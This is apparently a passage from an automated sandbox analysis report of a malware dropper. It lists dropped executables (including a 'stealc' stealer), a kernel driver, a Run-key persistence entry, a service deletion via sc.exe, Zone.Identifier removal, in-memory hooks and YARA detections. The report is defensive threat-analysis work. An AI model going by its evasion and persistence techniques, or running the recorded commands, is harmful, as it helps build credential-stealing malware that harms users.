Source:	Binary string: nss3.pdb@ source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: PE.pdbH] source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2181342436.00000000036B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sQGaH.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2458695015.00000000091B6000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: PE.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2181342436.00000000036B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: NjdbLPleIutA8FKI_S3fRztd.exe, 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: lisasoft.pdb source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965969296.0000013417198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.4ec0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.4ec0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2830297717.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2703688839.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eROo1ugNChgONSxoiS6DxyMi.exe PID: 1028, type: MEMORYSTR

.NET source code contains potential unpacker

Source: armadegon[1].exe.0.dr, Ay.cs	.Net Code: St System.Reflection.Assembly.Load(byte[])
Source: eROo1ugNChgONSxoiS6DxyMi.exe.0.dr, Ay.cs	.Net Code: St System.Reflection.Assembly.Load(byte[])

Source: 66b623c3b1dcb_Mowdiewart[1].exe.0.dr

Static PE information: 0xB64BF135 [Wed Dec 1 11:57:41 2066 UTC]

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe

Code function: 7_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00418320

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp/TC

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Static PE information: section name: _RDATA
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Static PE information: section name: .vmp/TC
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Static PE information: section name: .vmp/TC
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Static PE information: section name: .vmp/TC
Source: setup[1].exe.0.dr	Static PE information: section name: .sxdata
Source: 9SPLMMrYRskiaGUcrT9MofKl.exe.0.dr	Static PE information: section name: .sxdata

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_00411360 push ecx; mov dword ptr [esp], ecx	7_2_00411361
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_00413954 push eax; ret	7_2_00413972
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_00413CC0 push eax; ret	7_2_00413CEE
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_008A4519 push edx; retf	9_2_008A451A
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_008A4521 push edx; retf	9_2_008A4522
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BF6EF6 push es; ret	9_2_07BF6EF7
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_00403281 push ecx; ret	10_2_00403294
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0064A0AF push ecx; retf	10_2_0064A0B2
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02028F05 push ecx; ret	10_2_02028F18
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_015A22E6 push cs; retn 0001h	13_2_015A22E7
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_00441783 push edi; ret	15_2_00441785

Source: 66ae9cc050ded_file0308[1].exe.0.dr	Static PE information: section name: .text entropy: 7.733615032334482
Source: NjdbLPleIutA8FKI_S3fRztd.exe.0.dr	Static PE information: section name: .text entropy: 7.733615032334482
Source: 66b623c3b1dcb_Mowdiewart[1].exe.0.dr	Static PE information: section name: .text entropy: 6.855956374002983
Source: bQnXcKn6ehLDJGqEStjbnSyC.exe.0.dr	Static PE information: section name: .text entropy: 6.855956374002983

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe

File created: C:\Windows\TEMP\yqyegvqciyid.sys

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b5ac1092454_otraba[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66b623c3b1dcb_Mowdiewart[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File created: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	File created: C:\Program Files (x86)\NetVoyager\nv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b45c742e0a1_123p[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5b75106ac6_stealc[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5d9d3adbaa_defaultr[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\armadegon[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Jump to dropped file
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	File created: C:\Windows\Temp\yqyegvqciyid.sys	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\vcruntime140.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DHDAFBFCFHID\vcruntime140.dll	Jump to dropped file

Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe

File created: C:\Windows\Temp\yqyegvqciyid.sys

Jump to dropped file

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Jump to behavior

Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetVoyager
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetVoyager

Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VIFLJRPW"

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe

File opened: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE22380005 value: E9 CB 05 E6 FF	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE221E05D0 value: E9 3A FA 19 00	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE22390005 value: E9 9B 07 E0 FF	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE221907A0 value: E9 6A F8 1F 00	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE22010007 value: E9 AB 11 EB FF	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE21EC11B0 value: E9 5E EE 14 00	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE22020006 value: E9 BB 7F E7 FF	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE21E97FC0 value: E9 4C 80 18 00	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE1FF40007 value: E9 CB E3 E0 FF	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE1FD4E3D0 value: E9 3E 1C 1F 00	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE1FF50006 value: E9 AB 4D D0 FF	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Memory written: PID: 7008 base: 7FFE1FC54DB0 value: E9 5C B2 2F 00	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Memory written: PID: 5228 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Memory written: PID: 5228 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Memory written: PID: 5888 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Memory written: PID: 5888 base: 7FFE2220D9F0 value: E9 20 26 16 00

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
